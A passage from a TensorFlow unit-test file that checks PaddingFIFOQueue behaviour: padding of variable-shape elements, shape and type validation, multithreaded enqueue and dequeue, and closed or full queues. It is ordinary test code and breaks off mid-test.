def testConstructPaddingFIFOQueueWithNoShape(self):
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
r"When providing partial shapes, a list of shapes must be provided."):
tf.PaddingFIFOQueue(10, tf.float32, None).queue_ref.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), ((), (2,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testMultiEnqueueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], dequeued_t.eval())
self.assertAllEqual(elems[4:8], dequeued_t.eval())
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], dequeued_t.eval())
self.assertAllEqual(elems[4:8], dequeued_t.eval())
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32),
shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.string, tf.int32),
shapes=((None,), (1, None)))
str_elems = [
["a"],
["ab"],
["abc"],
["abc", "d"],
["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [
[[1]],
[[2]],
[[3]],
[[1, 2]],
[[1, 2, 3]],
[[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_many(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(
[[b"a", b"", b""], [b"ab", b"", b""], [b"abc", b"", b""],
[b"abc", b"d", b""], [b"abc", b"d", b"e"]], string_val)
self.assertAllEqual(
[[[1, 0, 0]],
[[2, 0, 0]],
[[3, 0, 0]],
[[1, 2, 0]],
[[1, 2, 3]]],
int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
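# The assertions above illustrate the padding contract being tested: dequeue_many
# pads each component up to the largest shape present in the dequeued batch
# (strings with b"" and ints with 0), while a plain dequeue returns the element unpadded.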
def testMultiDequeueUpToPartiallyKnownShapesAndVariableInputNoBlocking(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.string, tf.int32),
shapes=((None,), (1, None)))
str_elems = [
["a"],
["ab"],
["abc"],
["abc", "d"],
["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [
[[1]],
[[2]],
[[3]],
[[1, 2]],
[[1, 2, 3]],
[[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_up_to(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(
[[b"a", b"", b""], [b"ab", b"", b""], [b"abc", b"", b""],
[b"abc", b"d", b""], [b"abc", b"d", b"e"]], string_val)
self.assertAllEqual(
[[[1, 0, 0]],
[[2, 0, 0]],
[[3, 0, 0]],
[[1, 2, 0]],
[[1, 2, 3]]],
int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, 4, 4, 4),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testPartiallyKnownHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, None, 4, None),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((), (2,)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32, tf.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(tf.int32, enq.inputs[1].dtype)
self.assertEqual(tf.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
with self.assertRaises(ValueError):
q.enqueue((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError, r"Expected \[\?,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,\?,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
dequeued_t.eval()
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(101)
enqueue_op.run()
close_op.run()
# Dequeue up to 101 items in parallel on 10 threads, from closed queue.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(50, tf.float32, shapes=((),))
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
sess.run(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(sess.run(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_placeholder = tf.placeholder(tf.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = tf.placeholder(
tf.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(elements_enqueued,
elements_enqueued + count,
dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = tf.placeholder(tf.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
sess.run(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, dequeued_t.eval())
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(elements_dequeued,
elements_dequeued + count,
dtype=np.int32)
self.assertAllEqual(
expected_range, dequeuemany_t.eval({count_placeholder: count}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = tf.PaddingFIFOQueue(100, tf.int32, ((),))
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = tf.PaddingFIFOQueue(total_count, tf.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], sess.run(dequeued_t))
self.assertAllEqual(elems[3:], sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
sess.run(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], sess.run(dequeued_t))
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(dequeued_t)
self.assertEqual(elems[3], sess.run(cleanup_dequeue_t))
def close():
sess.run(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, (tf.float32, tf.float32), ((), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = sess.run([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
self.assertEqual([50.0], dequeued_t.eval())
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
time.sleep(0.01)
self.assertEqual([50.0], dequeued_t.eval())
self.assertEqual([60.0], dequeued_t.eval())
def testBlockingEnqueueBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, dequeued_t.eval())
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, dequeued_t.eval())
def testDoesNotLoseValue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(1, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(
1, tf.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = tf.PaddingFIFOQueue(
